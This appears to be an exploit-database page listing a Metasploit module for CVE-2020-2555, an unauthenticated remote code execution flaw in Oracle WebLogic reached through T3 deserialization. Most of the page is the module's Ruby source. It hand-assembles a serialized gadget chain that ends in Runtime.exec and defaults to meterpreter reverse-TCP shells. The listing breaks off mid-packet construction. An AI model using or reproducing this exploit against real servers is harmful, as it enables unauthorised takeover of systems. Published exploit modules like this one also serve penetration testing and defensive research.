WebLogic Server Deserialization RCE BadAttributeValueExpException (Metasploit)
CVE
Category
Price
Severity
CVE-2020-2555
CWE-502
$1000
Critical
Author
Risk
Exploitation Type
Date
Metasploit
High
Remote
2020-05-22
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction None UI The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality None C There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data. Integrity None I There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system. Availability High A There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050174 WebLogic Server Deserialization RCE BadAttributeValueExpException (Metasploit) ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebLogic Server Deserialization RCE - BadAttributeValueExpException',
'Description' => %q{
There exists a Java object deserialization vulnerability
in multiple versions of WebLogic.
Unauthenticated remote code execution can be achieved
by sending a serialized BadAttributeValueExpException object
over the T3 protocol to vulnerable WebLogic servers.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jang', # Vuln Discovery
'Y4er', # PoC
'Shelbsy Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2020-2555' ],
[ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
[ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
],
'Platform' => %w[unix linux win],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Privileged' => false,
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
}
],
[
'Unix',
{
'Platform' => %w[unix linux],
'CmdStagerFlavor' => 'printf',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
],
'DisclosureDate' => '2020-01-15',
'DefaultTarget' => 0
)
)
register_options([ Opt::RPORT(7001) ])
end
def check
connect
web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"
sock.put(web_req)
sleep(2)
res = sock.get_once
versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
return CheckCode::Unknown('Failed to obtain response from service') unless res
/WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
return CheckCode::Unknown('Failed to detect WebLogic') unless version
@version_no = Gem::Version.new(version)
print_status("WebLogic version detected: #{@version_no}")
return CheckCode::Appears if versions.include?(@version_no)
CheckCode::Detected('Version of WebLogic is not vulnerable')
ensure
disconnect
end
def exploit
super
connect
print_status('Sending handshake...')
t3_handshake
if target.name == 'Windows'
win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
win_obj.prepend('cmd.exe /c ')
win_obj = build_payload_obj(win_obj)
t3_send(win_obj)
else
execute_cmdstager
end
ensure
disconnect
end
def t3_handshake
# t3 12.2.1\nAS:255
# \nHL:19\nMS:100000
# 00\n\n
shake = '74332031322e322e310a41533a323535'
shake << '0a484c3a31390a4d533a313030303030'
shake << '30300a0a'
sock.put([shake].pack('H*'))
sleep(1)
sock.get_once
end
def build_payload_obj(payload_data)
payload_obj = 'aced' # STREAM_MAGIC
payload_obj << '0005' # STREAM_VERSION
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002e' # Class name length: 46
payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
payload_obj << '67656d656e742e426164'
payload_obj << '41747472696275746556'
payload_obj << '616c7565457870457863'
payload_obj << '657074696f6e'
payload_obj << 'd4e7daab632d4640' # SerialVersionUID
payload_obj << '020001' # Serialization flag, field num = 1
payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
payload_obj << '76616c' # Field name: val
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
payload_obj << '457863657074696f6e'
payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7872' # end block data, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
payload_obj << '5468726f7761626c65'
payload_obj << 'd5c635273977b8cb' # SerialVersionUID
payload_obj << '030004' # ?, then 4 fields
payload_obj << '4c0005' # Field type: Object, field name length: 5
payload_obj << '6361757365' # Field name: cause
payload_obj << '740015' # String, length: 21
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
payload_obj << '2f5468726f7761626c653b'
payload_obj << '4c000d' # Field type: Object, field name length: 13
payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
payload_obj << '740012' # String, length: 18
payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
payload_obj << '2f537472696e673b'
payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
payload_obj << '737461636b5472616365' # Field name: stackTrace
payload_obj << '74001e' # String, length: 30
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
payload_obj << '672f537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '4c0014' # Field type: Object, field name length: 20
payload_obj << '73757070726573736564' # Field name: suppressedExceptions
payload_obj << '457863657074696f6e73'
payload_obj << '740010' # String, length: 16
payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
payload_obj << '2f4c6973743b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0008' # handle?
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
payload_obj << '672e537461636b547261'
payload_obj << '6365456c656d656e743b'
payload_obj << '02462a3c3cfd2239' # SerialVersionUID
payload_obj << '020000' # Serializable, No fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000001'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '001b' # Class name length: 27
payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
payload_obj << '537461636b5472616365'
payload_obj << '456c656d656e74'
payload_obj << '6109c59a2636dd85' # SerialVersionUID
payload_obj << '020004' # Serializable, 4 fields
payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
payload_obj << '6c696e654e756d626572' # lineNumber
payload_obj << '4c000e' # Field type: Object, field name length: 14
payload_obj << '6465636c6172696e6743'
payload_obj << '6c617373' # declaringClass
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '66696c654e616d65' # fileName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '4c000a' # Field type: Object, field name length: 10
payload_obj << '6d6574686f644e616d65' # methodName
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000028'
class_name = Rex::Text.rand_text_alphanumeric(8..14)
formatted_class = class_name.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
payload_obj << '74' # String
payload_obj << class_name.length.to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555 -> PoC class name
payload_obj << '74' # String
payload_obj << (class_name.length + 5).to_s(16).rjust(4, '0')
payload_obj << formatted_class # Originally Weblogic_2555.java
payload_obj << '2e6a617661' # .java
payload_obj << '740004' # String, length: 4
payload_obj << '6d61696e' # main
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0026' # Class name length: 38
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c654c697374'
payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0004' # Field type: Object, field name length: 4
payload_obj << '6c697374' # list
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0007' # handle
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
payload_obj << '436f6c6c656374696f6e'
payload_obj << '7324556e6d6f64696669'
payload_obj << '61626c65436f6c6c6563'
payload_obj << '74696f6e'
payload_obj << '19420080cb5ef71e' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '4c0001' # Field type: Object, field name length: 1
payload_obj << '63' # Field name: c
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
payload_obj << '2f436f6c6c656374696f'
payload_obj << '6e3b'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
payload_obj << '41727261794c697374'
payload_obj << '7881d21d99c7619d' # SerialVersionUID
payload_obj << '030001' # ?, 1 field
payload_obj << '490004' # Field type: Integer, field name length: 4
payload_obj << '73697a65' # size
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7704' # TC_BLOCKDATA, length: 4
payload_obj << '00000000'
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << '007e0015' # handle
payload_obj << '78' # TC_ENDBLOCKDATA
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '0024' # Class name length: 36
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
payload_obj << '6f6c2e7574696c2e6669'
payload_obj << '6c7465722e4c696d6974'
payload_obj << '46696c746572'
payload_obj << limit_filter_uid # SerialVersionUID
payload_obj << '020006' # Serializable, 6 fields
payload_obj << '49000b' # Field type: Integer, field name length: 11
payload_obj << '6d5f635061676553697a65' # m_cPageSize
payload_obj << '490007' # Field type: Integer, field name length: 7
payload_obj << '6d5f6e50616765' # m_nPage
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f636f6d70617261746f72' # m_comparator
payload_obj << '740016' # String, length: 22
payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
payload_obj << '2f436f6d70617261746f'
payload_obj << '723b'
payload_obj << '4c0008' # Field type: Object, field name length: 8
payload_obj << '6d5f66696c746572' # m_filter
payload_obj << '74001a' # String, length: 26
payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
payload_obj << '736f6c2f7574696c2f46'
payload_obj << '696c7465723b'
payload_obj << '4c000f' # Field type: Object, field name length: 15
payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
payload_obj << '6f74746f6d'
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
payload_obj << '4c000c' # Field type: Object, field name length: 12
payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0001' # handle
unless @version_no == Gem::Version.new('12.1.3.0.0')
payload_obj << add_class_desc
end
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '00000000'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002c' # Class name length: 44
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4368'
payload_obj << '61696e65644578747261'
payload_obj << '63746f72'
payload_obj << chained_extractor_uid # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '0036' # Class name length: 54
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '737472616374436f6d70'
payload_obj << '6f736974654578747261'
payload_obj << '63746f72'
payload_obj << '086b3d8c05690f44' # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '5b000c' # Field type: Array, field name length: 12
payload_obj << '6d5f61457874726163746f72' # m_aExtractor
payload_obj << '740023' # String, length: 35
payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
payload_obj << '6f736f6c2f7574696c2f'
payload_obj << '56616c75654578747261'
payload_obj << '63746f723b'
payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
payload_obj << '002d' # Class name length: 45
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e4162'
payload_obj << '73747261637445787472'
payload_obj << '6163746f72'
payload_obj << abstract_extractor_uid # SerialVersionUID
payload_obj << '020001' # Serializable, 1 field
payload_obj << '490009' # Field type: Integer, field name length: 9
payload_obj << '6d5f6e546172676574' # m_nTarget
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0032' # Class name length: 50
payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
payload_obj << '6f736f6c2e7574696c2e'
payload_obj << '657874726163746f722e'
payload_obj << '5265666c656374696f6e'
payload_obj << '457874726163746f723b'
payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003'
payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
payload_obj << '002f' # Class name length: 47
payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
payload_obj << '6f6c2e7574696c2e6578'
payload_obj << '74726163746f722e5265'
payload_obj << '666c656374696f6e4578'
payload_obj << '74726163746f72'
payload_obj << reflection_extractor_uid # SerialVersionUID
payload_obj << '02000' # Serializable, variable fields orig: 020002
payload_obj << reflect_extract_count
payload_obj << '5b0009' # Field type: Array, field name length: 9
payload_obj << '6d5f616f506172616d' # m_aoParam
payload_obj << '740013' # String, length: 19
payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
payload_obj << '672f4f626a6563743b'
payload_obj << add_sect
payload_obj << '4c0009' # Object, length: 9
payload_obj << '6d5f734d6574686f64' # m_sMethod
payload_obj << '71' # TC_REFERENCE
payload_obj << '007e0005' # handle
payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
payload_obj << (change_handle? ? '007e001d' : '007e001e')
payload_obj << '00000000'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
payload_obj << '672e4f626a6563743b'
payload_obj << '90ce589f1073296c' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000002'
payload_obj << '74000a' # String, length: 10
payload_obj << '67657452756e74696d65' # getRuntime
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0012' # Class name length: 18
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
payload_obj << '672e436c6173733b'
payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000000'
payload_obj << add_tc_null
payload_obj << '740009' # String, length: 9
payload_obj << '6765744d6574686f64' # getMethod
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000002' # array size: 2
payload_obj << '7075' # TC_NULL, TC_ARRAY
payload_obj << '71' # TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000000'
payload_obj << add_tc_null
payload_obj << '740006' # TC_STRING, length: 6
payload_obj << '696e766f6b65' # invoke
payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
payload_obj << (change_handle? ? '007e0021' : '007e0022')
payload_obj << '00000000'
payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
payload_obj << (change_handle? ? '007e0024' : '007e0025')
payload_obj << '00000001'
payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
payload_obj << '0013' # Class name length: 19
payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
payload_obj << '672e537472696e673b'
payload_obj << 'add256e7e91d7b47' # SerialVersionUID
payload_obj << '020000' # Serializable, no fields
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
payload_obj << '00000003'
payload_bin = format_payload(payload_data)
payload_obj << payload_bin
# Original data
# ---------------------------
# payload_obj << '740007' # String, length: 7
# payload_obj << '2f62696e2f7368' # /bin/sh
# payload_obj << '740002' # String, length: 2
# payload_obj << '2d63' # -c
# payload_obj << '740017' # String, length: 23
# payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah
# payload_obj << '2f626c61685f7a655f62'
# payload_obj << '6c6168'
# ---------------------------
payload_obj << add_tc_null
payload_obj << '740004' # String, length: 4
payload_obj << '65786563' # exec
payload_obj << '7070' # TC_NULL, TC_NULL
payload_obj << '7672' # TC_CLASS, TC_CLASSDESC
payload_obj << '0011' # Class name length: 17
payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime
payload_obj << '52756e74696d65'
payload_obj << '00000000000000000000'
payload_obj << '00'
payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
end
def change_handle?
@version_no == Gem::Version.new('12.1.3.0.0')
end
def limit_filter_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'99022596d7b45953'
when Gem::Version.new('12.2.1.3.0')
'ab2901b976c4e271'
else
'954e4590be89865f'
end
end
def chained_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'889f81b0945d5b7f'
when Gem::Version.new('12.2.1.3.0')
'06ee10433a4cc4b4'
else
'435b250b72f63db5'
end
end
def abstract_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'658195303e723821'
when Gem::Version.new('12.2.1.3.0')
'752289ad4d460138'
else
'9b1be18ed70100e5'
end
end
def reflection_extractor_uid
case @version_no
when Gem::Version.new('12.1.3.0.0')
'ee7ae995c02fb4a2'
when Gem::Version.new('12.2.1.3.0')
'87973791b26429dd'
else
'1f62f564b951b614'
end
end
def reflect_extract_count
case @version_no
when Gem::Version.new('12.2.1.3.0')
'3'
else
'2'
end
end
def add_sect
sect = ''
if @version_no == Gem::Version.new('12.2.1.3.0')
sect << '4c0011' # Object, length: 17
sect << '6d5f657874726163746f' # m_extractorCached
sect << '72436163686564'
sect << '71' # TC_REFERENCE
sect << '007e0001' # handle
end
sect
end
def add_class_desc
class_desc = ''
class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
class_desc << '0034' # Class name length: 52
class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter
class_desc << '6f6c2e7574696c2e6669'
class_desc << '6c7465722e4162737472'
class_desc << '61637451756572795265'
class_desc << '636f7264657246696c74'
class_desc << '6572'
class_desc << 'f3b98201f680eb90' # SerialVersionUID
class_desc << '020000' # Serializable, no fields
end
def add_tc_null
return '70' if @version_no == Gem::Version.new('12.2.1.3.0')
''
end
def t3_send(payload_obj)
print_status('Sending object...')
request_obj = '000009f3' # Original packet length
request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
request_obj << 'ffffffffffffffff'
request_obj << '00000071'
request_obj << '0000ea60'
request_obj << '00000018432ec6'
request_obj << 'a2a63985b5af7d63e643'
request_obj << '83f42a6d92c9e9af0f94'
request_obj << '72027973720078720178'
request_obj << '720278700000000c0000'
request_obj << '00020000000000000000'
request_obj << '00000001007070707070'
request_obj << '700000000c0000000200'
request_obj << '00000000000000000000'
request_obj << '01007006'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000' # flags?
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f6e' # implVersion
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702' # TC_ENDBLOCKDATA
request_obj << '000078'
request_obj << 'fe010000' # separator
request_obj << payload_obj
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '001d' # Class name length: 29
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
request_obj << '6a766d2e436c61737354'
request_obj << '61626c65456e747279'
request_obj << '2f52658157f4f9ed' # SerialVersionUID
request_obj << '0c0000'
request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
request_obj << '0021' # Class name length: 33
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5065657249'
request_obj << '6e666f'
request_obj << '585474f39bc908f1' # SerialVersionUID
request_obj << '020007' # Serializable, 7 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '740027' # String, length: 39
request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
request_obj << '2f636f6d6d6f6e2f696e'
request_obj << '7465726e616c2f506163'
request_obj << '6b616765496e666f3b'
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5665727369'
request_obj << '6f6e496e666f'
request_obj << '972245516452463e' # SerialVersionUID
request_obj << '020003' # Serializable, 3 fields
request_obj << '5b0008' # Field type: Array, field name length: 8
request_obj << '7061636b61676573' # packages
request_obj << '71007e0003' # TC_REFERENCE, handle
request_obj << '4c000e' # Field type: Object, field name length: 14
request_obj << '72656c65617365566572' # releaseVersion
request_obj << '73696f6e'
request_obj << '740012' # String, length: 18
request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
request_obj << '2f537472696e673b'
request_obj << '5b0012' # Field type: Array, field name length: 18
request_obj << '76657273696f6e496e66' # versionInfoAsBytes
request_obj << '6f41734279746573'
request_obj << '740002' # String, length: 2
request_obj << '5b42' # [B
request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
request_obj << '0024' # Class name length: 36
request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
request_obj << '6f6d6d6f6e2e696e7465'
request_obj << '726e616c2e5061636b61'
request_obj << '6765496e666f'
request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
request_obj << '020009' # Serializable, 9 fields
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d616a6f72' # major
request_obj << '490005' # Field type: Int, field name length: 5
request_obj << '6d696e6f72' # minor
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '70617463685570646174' # patchUpdate
request_obj << '65'
request_obj << '49000c' # Field type: Int, field name length: 12
request_obj << '726f6c6c696e67506174' # rollingPatch
request_obj << '6368'
request_obj << '49000b' # Field type: Int, field name length: 11
request_obj << '73657276696365506163' # servicePack
request_obj << '6b'
request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
request_obj << '74656d706f7261727950' # temporaryPatch
request_obj << '61746368'
request_obj << '4c0009' # Field type: Object, field name length: 9
request_obj << '696d706c5469746c65' # implTitle
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000a' # Field type: Object, field name length: 10
request_obj << '696d706c56656e646f72' # implVendor
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '4c000b' # Field type: Object, field name length: 11
request_obj << '696d706c56657273696f' # implVersion
request_obj << '6e'
request_obj << '71007e0005' # TC_REFERENCE, handle
request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
request_obj << 'fe00ff' # separator
request_obj << 'fe010000'
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000'
request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '4621'
request_obj << '000000000000000000'
request_obj << '09' # length: 9
request_obj << '3132372e302e312e31' # 127.0.1.1
request_obj << '000b' # length: 11
request_obj << '75732d6c2d627265656e' # us-l-breens
request_obj << '73'
request_obj << 'a53caff10000000700'
request_obj << '001b59'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffff'
request_obj << '0078'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000'
